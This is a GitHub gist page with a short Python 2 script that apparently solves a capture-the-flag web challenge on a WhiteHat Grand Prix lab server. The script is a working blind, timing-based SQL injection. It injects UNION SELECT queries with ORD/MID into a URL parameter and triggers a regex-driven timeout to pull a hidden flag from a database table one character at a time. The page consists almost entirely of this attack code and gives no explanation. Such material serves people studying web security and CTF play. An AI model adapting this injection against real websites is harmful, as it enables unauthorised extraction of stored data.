Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
import urllib, urllib2
import string
import socket
url = 'http://lab5b.grandprix.whitehatvn.com/cgi-bin/web13377331.py?input=0x1337'
flag = ''
regex_fail = 'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyX'
i = 1
charset = string.letters + string.digits + '_'
while 1:
for c in charset:
print c,'......'
q = ' union select if(ord(mid((select fl4gfl4g from fl4g_web150 limit 1),{1},1))={0},repeat(\'y\',25),0)'
q = q.format(ord(c),i)
q = urllib.quote_plus(q)
q = q + '&submit=HIT'
tmp = url + q
# print tmp
try:
# start = time.time()
rq = urllib2.Request(tmp)
rp = urllib2.urlopen(rq, timeout=3)
content = rp.read()
rp.close()
# end = time.time()
except socket.timeout:
flag += c
i += 1
break
# print hex(c),'Time',(end - start)
print '[+] Flag',flag
# break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.